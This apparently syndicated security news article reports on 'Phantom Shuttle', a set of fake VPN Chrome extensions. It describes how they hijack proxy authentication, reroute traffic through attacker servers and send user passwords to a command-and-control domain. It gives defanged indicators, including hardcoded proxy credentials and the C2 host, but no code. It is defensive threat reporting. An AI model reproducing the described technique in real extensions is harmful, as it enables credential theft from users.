By rssfeeds-admin 
The extensions, published by the same threat actor using theknewone.com@gmail[.]com, have been active since 2017 and remain available on the Chrome Web Store, with more than 2,180 installations.
Marketed as “multi-location network speed testing plugins,” the extensions offer paid subscriptions ranging from ¥9.9 to ¥95.9 CNY ($1.40–$13.50 USD), giving users the illusion of legitimate VPN functionality.
Behind this professional interface, complete with Alipay and WeChat Pay payment integrations, the extensions perform full-scale traffic interception and credential exfiltration, functioning as man-in-the-middle (MITM) proxies.
Upon installation, Phantom Shuttle injects malicious code into the legitimate jQuery v1.12.2 library. This allows extensions to automatically inject hardcoded proxy credentials (topfany/963852wei) into every HTTP authentication challenge via the Chrome webRequest onAuthRequired API.
This operation transparently reroutes all user traffic through threat-actor-controlled proxy servers, thereby enabling continuous data capture without consent.
Credential Exfiltration and C2 Infrastructure
The extensions periodically communicate with their command-and-control (C2) server at phantomshuttle[.]space, hosted on Alibaba Cloud in Hong Kong.
The server, active as of December 23, 2025, manages user authentication, subscription status, and VIP level tracking.
Every five minutes, the extensions send user credentials, including email and plaintext passwords, via a heartbeat beacon to maintain session activity and relay stolen data.
Phantom Shuttle’s “smart proxy” mode selectively routes traffic from more than 170 high-value domains, including developer platforms such as GitHub, Stack Overflow, and Docker, as well as corporate and social media domains such as AWS, Twitter, and Facebook.
The targeting of developer tools and cloud services suggests a supply chain risk: stolen API keys and repository credentials could enable secondary compromises or malicious code-injection campaigns.
Socket’s Further inspection revealed the C2 uses multiple active endpoints for account registration, payment, and configuration retrieval.
All proxy authentication and update commands pass through these APIs, providing the threat actor with complete visibility into user activity and credentials.
Socket’s analysis attributes the campaign to a long-running, financially motivated operation rather than opportunistic malware.
By blending a subscription-based business model with browser permissions for proxy and webRequest control, Phantom Shuttle demonstrates how malicious extensions can monetize user trust and persist undetected for years.
Follow us on Google News , LinkedIn and X to Get More Instant Updates, Set Cyberpress as a Preferred Source in Google.
The post Fake VPN Chrome Extensions Abuse Browser Traffic Visibility to Harvest Sensitive User Credentials appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.